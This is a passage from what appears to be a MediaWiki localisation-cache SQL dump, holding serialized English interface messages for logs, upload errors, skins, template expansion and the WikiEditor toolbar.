$1\";'),('en','messages:revdelete-unhid','s:8:\"unhid $1\";'),('en','messages:revdelete-log-message','s:42:\"$1 for $2 {{PLURAL:$2|revision|revisions}}\";'),('en','messages:logdelete-log-message','s:36:\"$1 for $2 {{PLURAL:$2|event|events}}\";'),('en','messages:deletedarticle','s:16:\"deleted \"[[$1]]\"\";'),('en','messages:suppressedarticle','s:19:\"suppressed \"[[$1]]\"\";'),('en','messages:undeletedarticle','s:17:\"restored \"[[$1]]\"\";'),('en','messages:patrol-log-line','s:28:\"marked $1 of $2 patrolled $3\";'),('en','messages:patrol-log-auto','s:11:\"(automatic)\";'),('en','messages:patrol-log-diff','s:11:\"revision $1\";'),('en','messages:1movedto2','s:22:\"moved [[$1]] to [[$2]]\";'),('en','messages:1movedto2_redir','s:36:\"moved [[$1]] to [[$2]] over redirect\";'),('en','messages:move-redirect-suppressed','s:19:\"redirect suppressed\";'),('en','messages:newuserlog-create-entry','s:16:\"New user account\";'),('en','messages:newuserlog-create2-entry','s:22:\"created new account $1\";'),('en','messages:newuserlog-autocreate-entry','s:29:\"Account created automatically\";'),('en','messages:rightslogentry','s:45:\"changed group membership for $1 from $2 to $3\";'),('en','messages:rightslogentry-autopromote','s:40:\"was automatically promoted from $2 to $3\";'),('en','messages:feedback-bugornote','s:204:\"If you are ready to describe a technical problem in detail please [$1 report a bug].\nOtherwise, you can use the easy form below. Your comment will be added to the page \"[$3 $2]\", along with your username.\";'),('en','messages:feedback-subject','s:8:\"Subject:\";'),('en','messages:feedback-message','s:8:\"Message:\";'),('en','messages:feedback-cancel','s:6:\"Cancel\";'),('en','messages:feedback-submit','s:15:\"Submit Feedback\";'),('en','messages:feedback-adding','s:26:\"Adding feedback to page...\";'),('en','messages:feedback-error1','s:35:\"Error: Unrecognized result from API\";'),('en','messages:feedback-error2','s:18:\"Error: Edit failed\";'),('en','messages:feedback-error3','s:27:\"Error: No response from API\";'),('en','messages:feedback-thanks','s:60:\"Thanks! Your feedback has been posted to the page \"[$2 $1]\".\";'),('en','messages:feedback-close','s:4:\"Done\";'),('en','messages:feedback-bugcheck','s:68:\"Great! Just check that it is not already one of the [$1 known bugs].\";'),('en','messages:feedback-bugnew','s:27:\"I checked. Report a new bug\";'),('en','messages:searchsuggest-search','s:6:\"Search\";'),('en','messages:searchsuggest-containing','s:13:\"containing...\";'),('en','messages:api-error-badaccess-groups','s:51:\"You are not permitted to upload files to this wiki.\";'),('en','messages:api-error-badtoken','s:26:\"Internal error: Bad token.\";'),('en','messages:api-error-copyuploaddisabled','s:44:\"Uploading by URL is disabled on this server.\";'),('en','messages:api-error-duplicate','s:109:\"There {{PLURAL:$1|is [$2 another file]|are [$2 some other files]}} already on the site with the same content.\";'),('en','messages:api-error-duplicate-archive','s:155:\"There {{PLURAL:$1|was [$2 another file]|were [$2 some other files]}} already on the site with the same content, but {{PLURAL:$1|it was|they were}} deleted.\";'),('en','messages:api-error-duplicate-archive-popup-title','s:75:\"Duplicate {{PLURAL:$1|file that has|files that have}} already been deleted.\";'),('en','messages:api-error-duplicate-popup-title','s:35:\"Duplicate {{PLURAL:$1|file|files}}.\";'),('en','messages:api-error-empty-file','s:33:\"The file you submitted was empty.\";'),('en','messages:api-error-emptypage','s:41:\"Creating new, empty pages is not allowed.\";'),('en','messages:api-error-fetchfileerror','s:61:\"Internal error: Something went wrong while fetching the file.\";'),('en','messages:api-error-fileexists-forbidden','s:64:\"A file with name \"$1\" already exists, and cannot be overwritten.\";'),('en','messages:api-error-fileexists-shared-forbidden','s:94:\"A file with name \"$1\" already exists in the shared file repository, and cannot be overwritten.\";'),('en','messages:api-error-file-too-large','s:37:\"The file you submitted was too large.\";'),('en','messages:api-error-filename-tooshort','s:26:\"The filename is too short.\";'),('en','messages:api-error-filetype-banned','s:28:\"This type of file is banned.\";'),('en','messages:api-error-filetype-banned-type','s:131:\"$1 {{PLURAL:$4|is not a permitted file type|are not permitted file types}}. Permitted {{PLURAL:$3|file type is|file types are}} $2.\";'),('en','messages:api-error-filetype-missing','s:37:\"The filename is missing an extension.\";'),('en','messages:api-error-hookaborted','s:63:\"The modification you tried to make was aborted by an extension.\";'),('en','messages:api-error-http','s:44:\"Internal error: Unable to connect to server.\";'),('en','messages:api-error-illegal-filename','s:28:\"The filename is not allowed.\";'),('en','messages:api-error-internal-error','s:77:\"Internal error: Something went wrong with processing your upload on the wiki.\";'),('en','messages:api-error-invalid-file-key','s:56:\"Internal error: File was not found in temporary storage.\";'),('en','messages:api-error-missingparam','s:46:\"Internal error: Missing parameters on request.\";'),('en','messages:api-error-missingresult','s:58:\"Internal error: Could not determine if the copy succeeded.\";'),('en','messages:api-error-mustbeloggedin','s:38:\"You must be logged in to upload files.\";'),('en','messages:api-error-mustbeposted','s:43:\"Internal error: Request requires HTTP POST.\";'),('en','messages:api-error-noimageinfo','s:84:\"The upload succeeded, but the server did not give us any information about the file.\";'),('en','messages:api-error-nomodule','s:37:\"Internal error: No upload module set.\";'),('en','messages:api-error-ok-but-empty','s:40:\"Internal error: No response from server.\";'),('en','messages:api-error-overwrite','s:44:\"Overwriting an existing file is not allowed.\";'),('en','messages:api-error-stashfailed','s:54:\"Internal error: Server failed to store temporary file.\";'),('en','messages:api-error-publishfailed','s:56:\"Internal error: Server failed to publish temporary file.\";'),('en','messages:api-error-stasherror','s:53:\"There was an error while uploading the file to stash.\";'),('en','messages:api-error-timeout','s:52:\"The server did not respond within the expected time.\";'),('en','messages:api-error-unclassified','s:26:\"An unknown error occurred.\";'),('en','messages:api-error-unknown-code','s:20:\"Unknown error: \"$1\".\";'),('en','messages:api-error-unknown-error','s:69:\"Internal error: Something went wrong when trying to upload your file.\";'),('en','messages:api-error-unknown-warning','s:22:\"Unknown warning: \"$1\".\";'),('en','messages:api-error-unknownerror','s:20:\"Unknown error: \"$1\".\";'),('en','messages:api-error-uploaddisabled','s:35:\"Uploading is disabled on this wiki.\";'),('en','messages:api-error-verification-error','s:56:\"This file might be corrupt, or have the wrong extension.\";'),('en','messages:duration-seconds','s:31:\"$1 {{PLURAL:$1|second|seconds}}\";'),('en','messages:duration-minutes','s:31:\"$1 {{PLURAL:$1|minute|minutes}}\";'),('en','messages:duration-hours','s:27:\"$1 {{PLURAL:$1|hour|hours}}\";'),('en','messages:duration-days','s:25:\"$1 {{PLURAL:$1|day|days}}\";'),('en','messages:duration-weeks','s:27:\"$1 {{PLURAL:$1|week|weeks}}\";'),('en','messages:duration-years','s:27:\"$1 {{PLURAL:$1|year|years}}\";'),('en','messages:duration-decades','s:31:\"$1 {{PLURAL:$1|decade|decades}}\";'),('en','messages:duration-centuries','s:34:\"$1 {{PLURAL:$1|century|centuries}}\";'),('en','messages:duration-millennia','s:37:\"$1 {{PLURAL:$1|millennium|millennia}}\";'),('en','messages:rotate-comment','s:58:\"Image rotated by $1 {{PLURAL:$1|degree|degrees}} clockwise\";'),('en','messages:limitreport-title','s:22:\"Parser profiling data:\";'),('en','messages:limitreport-cputime','s:14:\"CPU time usage\";'),('en','messages:limitreport-cputime-value','s:31:\"$1 {{PLURAL:$1|second|seconds}}\";'),('en','messages:limitreport-walltime','s:15:\"Real time usage\";'),('en','messages:limitreport-walltime-value','s:31:\"$1 {{PLURAL:$1|second|seconds}}\";'),('en','messages:limitreport-ppvisitednodes','s:31:\"Preprocessor visited node count\";'),('en','messages:limitreport-ppvisitednodes-value','s:5:\"$1/$2\";'),('en','messages:limitreport-ppgeneratednodes','s:33:\"Preprocessor generated node count\";'),('en','messages:limitreport-ppgeneratednodes-value','s:5:\"$1/$2\";'),('en','messages:limitreport-postexpandincludesize','s:24:\"Post-expand include size\";'),('en','messages:limitreport-postexpandincludesize-value','s:30:\"$1/$2 {{PLURAL:$2|byte|bytes}}\";'),('en','messages:limitreport-templateargumentsize','s:22:\"Template argument size\";'),('en','messages:limitreport-templateargumentsize-value','s:30:\"$1/$2 {{PLURAL:$2|byte|bytes}}\";'),('en','messages:limitreport-expansiondepth','s:23:\"Highest expansion depth\";'),('en','messages:limitreport-expansiondepth-value','s:5:\"$1/$2\";'),('en','messages:limitreport-expensivefunctioncount','s:31:\"Expensive parser function count\";'),('en','messages:limitreport-expensivefunctioncount-value','s:5:\"$1/$2\";'),('en','messages:expandtemplates','s:16:\"Expand templates\";'),('en','messages:expand_templates_intro','s:295:\"This special page takes text and expands all templates in it recursively.\nIt also expands supported parser functions like\n{{#language:…}} and variables like\n{{CURRENTDAY}}.\nIn fact, it expands pretty much everything in double-braces.\";'),('en','messages:expand_templates_title','s:42:\"Context title, for {{FULLPAGENAME}}, etc.:\";'),('en','messages:expand_templates_input','s:11:\"Input text:\";'),('en','messages:expand_templates_output','s:6:\"Result\";'),('en','messages:expand_templates_xml_output','s:10:\"XML output\";'),('en','messages:expand_templates_html_output','s:15:\"Raw HTML output\";'),('en','messages:expand_templates_ok','s:2:\"OK\";'),('en','messages:expand_templates_remove_comments','s:15:\"Remove comments\";'),('en','messages:expand_templates_remove_nowiki','s:32:\"Suppress tags in result\";'),('en','messages:expand_templates_generate_xml','s:19:\"Show XML parse tree\";'),('en','messages:expand_templates_generate_rawhtml','s:13:\"Show raw HTML\";'),('en','messages:expand_templates_preview','s:7:\"Preview\";'),('en','messages:expand_templates_preview_fail_html','s:318:\"Because {{SITENAME}} has raw HTML enabled and there was a loss of session data, the preview is hidden as a precaution against JavaScript attacks.\n\nIf this is a legitimate preview attempt, please try again.\nIf it still does not work, try [[Special:UserLogout|logging out]] and logging back in.\";'),('en','messages:expand_templates_preview_fail_html_anon','s:253:\"Because {{SITENAME}} has raw HTML enabled and you are not logged in, the preview is hidden as a precaution against JavaScript attacks.\n\nIf this is a legitimate preview attempt, please [[Special:UserLogin|log in]] and try again.\";'),('en','messages:pagelanguage','s:22:\"Page language selector\";'),('en','messages:pagelang-name','s:4:\"Page\";'),('en','messages:pagelang-language','s:8:\"Language\";'),('en','messages:pagelang-use-default','s:20:\"Use default language\";'),('en','messages:pagelang-select-lang','s:15:\"Select language\";'),('en','messages:right-pagelang','s:20:\"Change page language\";'),('en','messages:action-pagelang','s:24:\"change the page language\";'),('en','messages:log-name-pagelang','s:19:\"Change language log\";'),('en','messages:log-description-pagelang','s:43:\"This is a log of changes in page languages.\";'),('en','messages:logentry-pagelang-pagelang','s:60:\"$1 {{GENDER:$2|changed}} page language for $3 from $4 to $5.\";'),('en','messages:default-skin-not-found','s:1493:\"Whoops! The default skin for your wiki, defined in $wgDefaultSkin as $1, is not available.\n\nYour installation seems to include the following skins. See [https://www.mediawiki.org/wiki/Manual:Skin_configuration Manual: Skin configuration] for information how to enable them and choose the default.\n\n$2\n\n; If you have just installed MediaWiki:\n: You probably installed from git, or directly from the source code using some other method. This is expected. Try installing some skins from [https://www.mediawiki.org/wiki/Category:All_skins mediawiki.org\'s skin directory], by:\n:* Downloading the [https://www.mediawiki.org/wiki/Download tarball installer], which comes with several skins and extensions. You can copy and paste the skins/ directory from it.\n:* Cloning one of the mediawiki/skins/* repositories via git into the skins/ directory of your MediaWiki installation.\n: Doing this should not interfere with your git repository if you\'re a MediaWiki developer.\n\n; If you have just upgraded MediaWiki:\n: MediaWiki 1.24 and newer no longer automatically enables installed skins (see [https://www.mediawiki.org/wiki/Manual:Skin_autodiscovery Manual: Skin autodiscovery]). You can paste the following lines into LocalSettings.php to enable all currently installed skins:\n\n
                                                                $3
                                                                \n\n; If you have just modified LocalSettings.php:\n: Double-check the skin names for typos.\";'),('en','messages:default-skin-not-found-no-skins','s:1095:\"Whoops! The default skin for your wiki, defined in $wgDefaultSkin as $1, is not available.\n\nYou have no installed skins.\n\n; If you have just installed or upgraded MediaWiki:\n: You probably installed from git, or directly from the source code using some other method. This is expected. MediaWiki 1.24 and newer doesn\'t include any skins in the main repository. Try installing some skins from [https://www.mediawiki.org/wiki/Category:All_skins mediawiki.org\'s skin directory], by:\n:* Downloading the [https://www.mediawiki.org/wiki/Download tarball installer], which comes with several skins and extensions. You can copy and paste the skins/ directory from it.\n:* Cloning one of the mediawiki/skins/* repositories via git into the skins/ directory of your MediaWiki installation.\n: Doing this should not interfere with your git repository if you\'re a MediaWiki developer. See [https://www.mediawiki.org/wiki/Manual:Skin_configuration Manual: Skin configuration] for information how to enable skins and choose the default.\n\";'),('en','messages:default-skin-not-found-row-enabled','s:32:\"* $1 / $2 (enabled)\";'),('en','messages:default-skin-not-found-row-disabled','s:39:\"* $1 / $2 (\'\'\'disabled\'\'\')\";'),('en','messages:mediastatistics','s:16:\"Media statistics\";'),('en','messages:mediastatistics-summary','s:138:\"Statistics about uploaded file types. This only includes the most recent version of a file. Old or deleted versions of files are excluded.\";'),('en','messages:mediastatistics-nfiles','s:8:\"$1 ($2%)\";'),('en','messages:mediastatistics-nbytes','s:40:\"{{PLURAL:$1|$1 byte|$1 bytes}} ($2; $3%)\";'),('en','messages:mediastatistics-table-mimetype','s:9:\"MIME type\";'),('en','messages:mediastatistics-table-extensions','s:19:\"Possible extensions\";'),('en','messages:mediastatistics-table-count','s:15:\"Number of files\";'),('en','messages:mediastatistics-table-totalbytes','s:13:\"Combined size\";'),('en','messages:mediastatistics-header-unknown','s:7:\"Unknown\";'),('en','messages:mediastatistics-header-bitmap','s:13:\"Bitmap images\";'),('en','messages:mediastatistics-header-drawing','s:24:\"Drawings (vector images)\";'),('en','messages:mediastatistics-header-audio','s:5:\"Audio\";'),('en','messages:mediastatistics-header-video','s:6:\"Videos\";'),('en','messages:mediastatistics-header-multimedia','s:10:\"Rich media\";'),('en','messages:mediastatistics-header-office','s:6:\"Office\";'),('en','messages:mediastatistics-header-text','s:7:\"Textual\";'),('en','messages:mediastatistics-header-executable','s:11:\"Executables\";'),('en','messages:mediastatistics-header-archive','s:18:\"Compressed formats\";'),('en','messages:json-warn-trailing-comma','s:65:\"$1 trailing {{PLURAL:$1|comma was|commas were}} removed from JSON\";'),('en','messages:json-error-unknown','s:44:\"There was a problem with the JSON. Error: $1\";'),('en','messages:json-error-depth','s:41:\"The maximum stack depth has been exceeded\";'),('en','messages:json-error-state-mismatch','s:25:\"Invalid or malformed JSON\";'),('en','messages:json-error-ctrl-char','s:53:\"Control character error, possibly incorrectly encoded\";'),('en','messages:json-error-syntax','s:12:\"Syntax error\";'),('en','messages:json-error-utf8','s:56:\"Malformed UTF-8 characters, possibly incorrectly encoded\";'),('en','messages:json-error-recursion','s:59:\"One or more recursive references in the value to be encoded\";'),('en','messages:json-error-inf-or-nan','s:56:\"One or more NAN or INF values in the value to be encoded\";'),('en','messages:json-error-unsupported-type','s:50:\"A value of a type that cannot be encoded was given\";'),('en','messages:ooui-outline-control-move-down','s:14:\"Move item down\";'),('en','messages:ooui-outline-control-move-up','s:12:\"Move item up\";'),('en','messages:ooui-outline-control-remove','s:11:\"Remove item\";'),('en','messages:ooui-toolbar-more','s:4:\"More\";'),('en','messages:ooui-dialog-message-accept','s:2:\"OK\";'),('en','messages:ooui-dialog-message-reject','s:6:\"Cancel\";'),('en','messages:ooui-dialog-process-error','s:20:\"Something went wrong\";'),('en','messages:ooui-dialog-process-dismiss','s:7:\"Dismiss\";'),('en','messages:ooui-dialog-process-retry','s:9:\"Try again\";'),('en','messages:cologneblue.css','s:64:\"/* CSS placed here will affect users of the Cologne Blue skin */\";'),('en','messages:cologneblue.js','s:78:\"/* Any JavaScript here will be loaded for users using the Cologne Blue skin */\";'),('en','messages:skinname-cologneblue','s:12:\"Cologne Blue\";'),('en','messages:cologneblue-desc','s:42:\"A lightweight skin with minimal formatting\";'),('en','messages:modern.css','s:58:\"/* CSS placed here will affect users of the Modern skin */\";'),('en','messages:modern.js','s:72:\"/* Any JavaScript here will be loaded for users using the Modern skin */\";'),('en','messages:skinname-modern','s:6:\"Modern\";'),('en','messages:modern-desc','s:66:\"A blue/grey theme with sidebar and top bar. Derived from MonoBook.\";'),('en','messages:skinname-monobook','s:8:\"MonoBook\";'),('en','messages:monobook-desc','s:109:\"The classic MediaWiki skin since 2004, named after the black-and-white photo of a book in the page background\";'),('en','messages:monobook.css','s:60:\"/* CSS placed here will affect users of the MonoBook skin */\";'),('en','messages:monobook.js','s:74:\"/* Any JavaScript here will be loaded for users using the MonoBook skin */\";'),('en','messages:skinname-vector','s:6:\"Vector\";'),('en','messages:vector-skin-desc','s:74:\"Modern version of MonoBook with fresh look and many usability improvements\";'),('en','messages:vector.css','s:58:\"/* CSS placed here will affect users of the Vector skin */\";'),('en','messages:vector.js','s:72:\"/* Any JavaScript here will be loaded for users using the Vector skin */\";'),('en','messages:vector-action-addsection','s:9:\"Add topic\";'),('en','messages:vector-action-delete','s:6:\"Delete\";'),('en','messages:vector-action-move','s:4:\"Move\";'),('en','messages:vector-action-protect','s:7:\"Protect\";'),('en','messages:vector-action-undelete','s:8:\"Undelete\";'),('en','messages:vector-action-unprotect','s:17:\"Change protection\";'),('en','messages:vector-view-create','s:6:\"Create\";'),('en','messages:vector-view-edit','s:4:\"Edit\";'),('en','messages:vector-view-history','s:12:\"View history\";'),('en','messages:vector-view-view','s:4:\"Read\";'),('en','messages:vector-view-viewsource','s:11:\"View source\";'),('en','messages:vector-more-actions','s:4:\"More\";'),('en','messages:wikieditor','s:35:\"Advanced wikitext editing interface\";'),('en','messages:wikieditor-desc','s:84:\"Provides an extendable wikitext editing interface and many feature-providing modules\";'),('en','messages:wikieditor-wikitext-tab','s:8:\"Wikitext\";'),('en','messages:wikieditor-loading','s:10:\"Loading...\";'),('en','messages:wikieditor-preview-preference','s:27:\"Enable side-by-side preview\";'),('en','messages:wikieditor-preview-tab','s:7:\"Preview\";'),('en','messages:wikieditor-preview-changes-tab','s:7:\"Changes\";'),('en','messages:wikieditor-preview-loading','s:10:\"Loading...\";'),('en','messages:wikieditor-previewDialog-preference','s:21:\"Enable preview dialog\";'),('en','messages:wikieditor-previewDialog-tab','s:7:\"Preview\";'),('en','messages:wikieditor-previewDialog-loading','s:10:\"Loading...\";'),('en','messages:wikieditor-publish-preference','s:30:\"Enable step-by-step publishing\";'),('en','messages:wikieditor-publish-button-publish','s:7:\"Publish\";'),('en','messages:wikieditor-publish-button-cancel','s:6:\"Cancel\";'),('en','messages:wikieditor-publish-dialog-title','s:23:\"Publish to {{SITENAME}}\";'),('en','messages:wikieditor-publish-dialog-summary','s:58:\"Edit summary (briefly describe the changes you have made):\";'),('en','messages:wikieditor-publish-dialog-minor','s:10:\"Minor edit\";'),('en','messages:wikieditor-publish-dialog-watch','s:15:\"Watch this page\";'),('en','messages:wikieditor-publish-dialog-publish','s:7:\"Publish\";'),('en','messages:wikieditor-publish-dialog-goback','s:7:\"Go back\";'),('en','messages:wikieditor-toolbar','s:15:\"Editing toolbar\";'),('en','messages:wikieditor-toolbar-desc','s:41:\"Edit page toolbar with enhanced usability\";'),('en','messages:wikieditor-toolbar-preference','s:31:\"Enable enhanced editing toolbar\";'),('en','messages:wikieditor-toolbar-dialogs-preference','s:85:\"Enable wizards for inserting links, tables as well as the search and replace function\";'),('en','messages:wikieditor-toolbar-hidesig','s:58:\"Hide the signature button from pages in the main namespace\";'),('en','messages:wikieditor-toolbar-loading','s:10:\"Loading...\";'),('en','messages:wikieditor-toolbar-tool-bold','s:4:\"Bold\";'),('en','messages:wikieditor-toolbar-tool-bold-example','s:9:\"Bold text\";'),('en','messages:wikieditor-toolbar-tool-italic','s:6:\"Italic\";'),('en','messages:wikieditor-toolbar-tool-italic-example','s:11:\"Italic text\";'),('en','messages:wikieditor-toolbar-tool-ilink','s:13:\"Internal link\";'),('en','messages:wikieditor-toolbar-tool-ilink-example','s:10:\"Link title\";'),('en','messages:wikieditor-toolbar-tool-xlink','s:39:\"External link (remember http:// prefix)\";'),('en','messages:wikieditor-toolbar-tool-xlink-example','s:33:\"http://www.example.com link title\";'),('en','messages:wikieditor-toolbar-tool-link','s:4:\"Link\";'),('en','messages:wikieditor-toolbar-tool-link-title','s:11:\"Insert link\";'),('en','messages:wikieditor-toolbar-tool-link-int','s:14:\"To a wiki page\";'),('en','messages:wikieditor-toolbar-tool-link-int-target','s:19:\"Target page or URL:\";'),('en','messages:wikieditor-toolbar-tool-link-int-target-tooltip','s:17:\"Page title or URL\";'),('en','messages:wikieditor-toolbar-tool-link-int-text','s:16:\"Text to display:\";'),('en','messages:wikieditor-toolbar-tool-link-int-text-tooltip','s:20:\"Text to be displayed\";'),('en','messages:wikieditor-toolbar-tool-link-ext','s:23:\"To an external web page\";'),('en','messages:wikieditor-toolbar-tool-link-ext-target','s:9:\"Link URL:\";'),('en','messages:wikieditor-toolbar-tool-link-ext-text','s:10:\"Link text:\";'),('en','messages:wikieditor-toolbar-tool-link-insert','s:11:\"Insert link\";'),('en','messages:wikieditor-toolbar-tool-link-cancel','s:6:\"Cancel\";'),('en','messages:wikieditor-toolbar-tool-link-int-target-status-exists','s:11:\"Page exists\";'),('en','messages:wikieditor-toolbar-tool-link-int-target-status-notexists','s:19:\"Page does not exist\";'),('en','messages:wikieditor-toolbar-tool-link-int-target-status-invalid','s:13:\"Invalid title\";'),('en','messages:wikieditor-toolbar-tool-link-int-target-status-external','s:13:\"External link\";'),('en','messages:wikieditor-toolbar-tool-link-int-target-status-loading','s:26:\"Checking page existence...\";'),('en','messages:wikieditor-toolbar-tool-link-int-target-status-disambig','s:19:\"Disambiguation page\";'),('en','messages:wikieditor-toolbar-tool-link-int-invalid','s:35:\"The title you specified is invalid.\";'),('en','messages:wikieditor-toolbar-tool-link-lookslikeinternal','s:121:\"The URL you specified looks like it was intended as a link to another wiki page.\nDo you want to make it an internal link?\";'),('en','messages:wikieditor-toolbar-tool-link-lookslikeinternal-int','s:13:\"Internal link\";'),('en','messages:wikieditor-toolbar-tool-link-lookslikeinternal-ext','s:13:\"External link\";'),('en','messages:wikieditor-toolbar-tool-link-empty','s:38:\"You did not enter anything to link to.\";'),('en','messages:wikieditor-toolbar-tool-file','s:13:\"Embedded file\";'),('en','messages:wikieditor-toolbar-tool-file-example','s:11:\"Example.jpg\";'),('en','messages:wikieditor-toolbar-tool-file-title','s:11:\"Insert file\";'),('en','messages:wikieditor-toolbar-file-target','s:9:\"Filename:\";'),('en','messages:wikieditor-toolbar-file-caption','s:8:\"Caption:\";'),('en','messages:wikieditor-toolbar-file-size','s:5:\"Size:\";'),('en','messages:wikieditor-toolbar-file-float','s:6:\"Align:\";'),('en','messages:wikieditor-toolbar-file-default','s:9:\"(default)\";'),('en','messages:wikieditor-toolbar-file-format','s:7:\"Format:\";'),('en','messages:wikieditor-toolbar-file-format-none','s:4:\"none\";'),('en','messages:wikieditor-toolbar-tool-file-insert','s:6:\"Insert\";'),('en','messages:wikieditor-toolbar-tool-file-cancel','s:6:\"Cancel\";'),('en','messages:wikieditor-toolbar-tool-reference','s:9:\"Reference\";'),('en','messages:wikieditor-toolbar-tool-reference-example','s:25:\"Insert footnote text here\";'),('en','messages:wikieditor-toolbar-tool-reference-cancel','s:6:\"Cancel\";'),('en','messages:wikieditor-toolbar-tool-reference-title','s:16:\"Insert reference\";'),('en','messages:wikieditor-toolbar-tool-reference-insert','s:6:\"Insert\";'),('en','messages:wikieditor-toolbar-tool-reference-text','s:14:\"Reference text\";'),('en','messages:wikieditor-toolbar-tool-signature','s:23:\"Signature and timestamp\";'),('en','messages:wikieditor-toolbar-section-advanced','s:8:\"Advanced\";'),('en','messages:wikieditor-toolbar-tool-heading','s:7:\"Heading\";'),('en','messages:wikieditor-toolbar-tool-heading-1','s:7:\"Level 1\";'),('en','messages:wikieditor-toolbar-tool-heading-2','s:7:\"Level 2\";'),('en','messages:wikieditor-toolbar-tool-heading-3','s:7:\"Level 3\";'),('en','messages:wikieditor-toolbar-tool-heading-4','s:7:\"Level 4\";'),('en','messages:wikieditor-toolbar-tool-heading-5','s:7:\"Level 5\";'),('en','messages:wikieditor-toolbar-tool-heading-example','s:12:\"Heading text\";'),('en','messages:wikieditor-toolbar-group-format','s:6:\"Format\";'),('en','messages:wikieditor-toolbar-tool-ulist','s:13:\"Bulleted list\";'),('en','messages:wikieditor-toolbar-tool-ulist-example','s:18:\"Bulleted list item\";'),('en','messages:wikieditor-toolbar-tool-olist','s:13:\"Numbered list\";'),('en','messages:wikieditor-toolbar-tool-olist-example','s:18:\"Numbered list item\";'),('en','messages:wikieditor-toolbar-tool-nowiki','s:18:\"No wiki formatting\";'),('en','messages:wikieditor-toolbar-tool-nowiki-example','s:30:\"Insert non-formatted text here\";'),('en','messages:wikieditor-toolbar-tool-redirect','s:8:\"Redirect\";'),('en','messages:wikieditor-toolbar-tool-redirect-example','s:16:\"Target page name\";'),('en','messages:wikieditor-toolbar-tool-big','s:3:\"Big\";'),('en','messages:wikieditor-toolbar-tool-big-example','s:8:\"Big text\";'),('en','messages:wikieditor-toolbar-tool-small','s:5:\"Small\";'),('en','messages:wikieditor-toolbar-tool-small-example','s:10:\"Small text\";'),('en','messages:wikieditor-toolbar-tool-superscript','s:11:\"Superscript\";'),('en','messages:wikieditor-toolbar-tool-superscript-example','s:16:\"Superscript text\";'),('en','messages:wikieditor-toolbar-tool-subscript','s:9:\"Subscript\";'),('en','messages:wikieditor-toolbar-tool-subscript-example','s:14:\"Subscript text\";'),('en','messages:wikieditor-toolbar-group-insert','s:6:\"Insert\";'),('en','messages:wikieditor-toolbar-tool-gallery','s:15:\"Picture gallery\";'),('en','messages:wikieditor-toolbar-tool-gallery-example','s:41:\"Example.jpg|Caption1\nExample.jpg|Caption2\";'),('en','messages:wikieditor-toolbar-tool-newline','s:8:\"New line\";'),('en','messages:wikieditor-toolbar-tool-table','s:5:\"Table\";'),('en','messages:wikieditor-toolbar-tool-table-example-old','s:136:\"-\n! header 1\n! header 2\n! header 3\n|-\n| row 1, cell 1\n| row 1, cell 2\n| row 1, cell 3\n|-\n| row 2, cell 1\n| row 2, cell 2\n| row 2, cell 3\";'),('en','messages:wikieditor-toolbar-tool-table-example-cell-text','s:9:\"Cell text\";'),('en','messages:wikieditor-toolbar-tool-table-example-header','s:11:\"Header text\";'),('en','messages:wikieditor-toolbar-tool-table-title','s:12:\"Insert table\";'),('en','messages:wikieditor-toolbar-tool-table-dimensions-rows','s:4:\"Rows\";'),('en','messages:wikieditor-toolbar-tool-table-dimensions-columns','s:7:\"Columns\";'),('en','messages:wikieditor-toolbar-tool-table-dimensions-header','s:14:\"Add header row\";'),('en','messages:wikieditor-toolbar-tool-table-wikitable','s:18:\"Style with borders\";'),('en','messages:wikieditor-toolbar-tool-table-sortable','s:19:\"Make table sortable\";'),('en','messages:wikieditor-toolbar-tool-table-example','s:7:\"Example\";'),('en','messages:wikieditor-toolbar-tool-table-preview','s:7:\"Preview\";'),('en','messages:wikieditor-toolbar-tool-table-insert','s:6:\"Insert\";'),('en','messages:wikieditor-toolbar-tool-table-cancel','s:6:\"Cancel\";'),('en','messages:wikieditor-toolbar-tool-table-example-text','s:216:\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut nec purus diam. Sed aliquam imperdiet nunc quis lacinia. Donec rutrum consectetur placerat. Sed volutpat neque non purus faucibus id ultricies enim euismod.\";'),('en','messages:wikieditor-toolbar-tool-table-toomany','s:77:\"Inserting a table with more than 1000 cells is not possible with this dialog.\";'),('en','messages:wikieditor-toolbar-tool-table-invalidnumber','s:55:\"You have not entered a valid number of rows or columns.\";'),('en','messages:wikieditor-toolbar-tool-table-zero','s:52:\"You cannot insert a table with zero rows or columns.\";'),('en','messages:wikieditor-toolbar-tool-replace','s:18:\"Search and replace\";'),('en','messages:wikieditor-toolbar-tool-replace-title','s:18:\"Search and replace\";'),('en','messages:wikieditor-toolbar-tool-replace-search','s:11:\"Search for:\";'),('en','messages:wikieditor-toolbar-tool-replace-replace','s:13:\"Replace with:\";'),('en','messages:wikieditor-toolbar-tool-replace-case','s:10:\"Match case\";'),('en','messages:wikieditor-toolbar-tool-replace-regex','s:43:\"Treat search string as a regular expression\";'),('en','messages:wikieditor-toolbar-tool-replace-button-findnext','s:9:\"Find next\";'),('en','messages:wikieditor-toolbar-tool-replace-button-replace','s:7:\"Replace\";'),('en','messages:wikieditor-toolbar-tool-replace-button-replaceall','s:11:\"Replace all\";'),('en','messages:wikieditor-toolbar-tool-replace-close','s:5:\"Close\";'),('en','messages:wikieditor-toolbar-tool-replace-nomatch','s:35:\"Your search did not match anything.\";'),('en','messages:wikieditor-toolbar-tool-replace-success','s:47:\"$1 {{PLURAL:$1|replacement|replacements}} made.\";'),('en','messages:wikieditor-toolbar-tool-replace-emptysearch','s:41:\"You did not enter anything to search for.\";'),('en','messages:wikieditor-toolbar-tool-replace-invalidregex','s:49:\"The regular expression you entered is invalid: $1\";'),('en','messages:wikieditor-toolbar-section-characters','s:18:\"Special characters\";'),('en','messages:wikieditor-toolbar-characters-page-latin','s:5:\"Latin\";'),('en','messages:wikieditor-toolbar-characters-page-latinextended','s:14:\"Latin extended\";'),('en','messages:wikieditor-toolbar-characters-page-ipa','s:3:\"IPA\";'),('en','messages:wikieditor-toolbar-characters-page-symbols','s:7:\"Symbols\";'),('en','messages:wikieditor-toolbar-characters-page-greek','s:5:\"Greek\";'),('en','messages:wikieditor-toolbar-characters-page-cyrillic','s:8:\"Cyrillic\";'),('en','messages:wikieditor-toolbar-characters-page-arabic','s:6:\"Arabic\";'),('en','messages:wikieditor-toolbar-characters-page-arabicextended','s:15:\"Arabic 